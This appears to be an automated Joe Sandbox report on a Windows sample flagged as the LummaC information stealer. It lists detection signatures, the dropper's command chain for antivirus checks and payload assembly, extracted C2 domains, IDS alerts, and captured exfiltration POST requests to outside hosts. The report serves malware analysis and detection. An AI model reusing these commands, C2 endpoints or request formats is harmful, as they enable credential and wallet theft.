Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TNyOrM6mIM.exe

Overview

General Information

Sample name:TNyOrM6mIM.exe
renamed because original name is a hash value
Original sample name:ec19fa1027fee164803cc127aef64199.exe
Analysis ID:1581619
MD5:ec19fa1027fee164803cc127aef64199
SHA1:8a1c7cd16c432a67eb9d71fe745d5ce5e4315dfd
SHA256:bb6ed22605e38edeea643fc3ef43ced73ba96cc3740f8e1d4332932a36d45a41
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Leaks process information
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TNyOrM6mIM.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\TNyOrM6mIM.exe" MD5: EC19FA1027FEE164803CC127AEF64199)
    • PasoCattle.exe (PID: 6572 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)
      • cmd.exe (PID: 6804 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5844 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 5692 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 604 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 2900 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 848 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7004 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 5632 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6828 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Climb.com (PID: 6996 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 5680 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • Set-up.exe (PID: 6744 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "spuriotis.click", "inherineau.buzz", "scentniej.buzz"], "Build id": "5FwhVM--lll"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Climb.com PID: 6996JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Climb.com PID: 6996JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Climb.com PID: 6996JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: Climb.com PID: 6996JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                SourceRuleDescriptionAuthorStrings
                0.2.TNyOrM6mIM.exe.850000.0.unpackMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
                • 0x78d71d:$s1: Runner
                • 0x78d882:$s3: RunOnStartup
                • 0x78d731:$a1: Antis
                • 0x78d75e:$a2: antiVM
                • 0x78d765:$a3: antiSandbox
                • 0x78d771:$a4: antiDebug
                • 0x78d77b:$a5: antiEmulator
                • 0x78d788:$a6: enablePersistence
                • 0x78d79a:$a7: enableFakeError
                • 0x78d8ab:$a8: DetectVirtualMachine
                • 0x78d8d0:$a9: DetectSandboxie
                • 0x78d8fb:$a10: DetectDebugger
                • 0x78d90a:$a11: CheckEmulator

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6804, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2900, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:56:59.566499+010020283713Unknown Traffic192.168.2.1249718104.21.2.51443TCP
                2024-12-28T09:57:01.657556+010020283713Unknown Traffic192.168.2.1249721104.21.2.51443TCP
                2024-12-28T09:57:04.092642+010020283713Unknown Traffic192.168.2.1249722104.21.2.51443TCP
                2024-12-28T09:57:06.345220+010020283713Unknown Traffic192.168.2.1249723104.21.2.51443TCP
                2024-12-28T09:57:08.729694+010020283713Unknown Traffic192.168.2.1249724104.21.2.51443TCP
                2024-12-28T09:57:11.179091+010020283713Unknown Traffic192.168.2.1249725104.21.2.51443TCP
                2024-12-28T09:57:13.643766+010020283713Unknown Traffic192.168.2.1249726104.21.2.51443TCP
                2024-12-28T09:57:17.397219+010020283713Unknown Traffic192.168.2.1249728104.21.2.51443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:57:00.389426+010020546531A Network Trojan was detected192.168.2.1249718104.21.2.51443TCP
                2024-12-28T09:57:02.458749+010020546531A Network Trojan was detected192.168.2.1249721104.21.2.51443TCP
                2024-12-28T09:57:18.198459+010020546531A Network Trojan was detected192.168.2.1249728104.21.2.51443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:57:00.389426+010020498361A Network Trojan was detected192.168.2.1249718104.21.2.51443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:57:02.458749+010020498121A Network Trojan was detected192.168.2.1249721104.21.2.51443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:57:12.023579+010020480941Malware Command and Control Activity Detected192.168.2.1249725104.21.2.51443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: TNyOrM6mIM.exeAvira: detected
                Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798Avira URL Cloud: Label: malware
                Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lseAvira URL Cloud: Label: malware
                Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3Avira URL Cloud: Label: malware
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "spuriotis.click", "inherineau.buzz", "scentniej.buzz"], "Build id": "5FwhVM--lll"}
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeReversingLabs: Detection: 69%
                Source: TNyOrM6mIM.exeReversingLabs: Detection: 65%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.0% probability
                Source: TNyOrM6mIM.exeJoe Sandbox ML: detected
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: spuriotis.click
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmpString decryptor: 5FwhVM--lll
                Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_5f503452-6
                Source: TNyOrM6mIM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49728 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406301 FindFirstFileW,FindClose,2_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00ACDC54
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_00ADA087
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_00ADA1E2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_00ACE472
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ADA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_00ADA570
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD66DC FindFirstFileW,FindNextFileW,FindClose,14_2_00AD66DC
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00A9C622 FindFirstFileExW,14_2_00A9C622
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_00AD73D4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AD7333 FindFirstFileW,FindClose,14_2_00AD7333
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00ACD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00ACD921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49718 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49718 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49728 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49725 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49721 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49721 -> 104.21.2.51:443
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: spuriotis.click
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 502157Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 38 36 37 35 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c
                Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
                Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
                Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49718 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49721 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49725 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49722 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49726 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49728 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49724 -> 104.21.2.51:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49723 -> 104.21.2.51:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W4VT9U8C13User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12787Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7H5VWCKKRPBASPSMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C4T4PAUKBR25MPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20221Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FIHNBRZDAAYIUNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1205Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=10Z7J3JV28FW6XXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571886Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
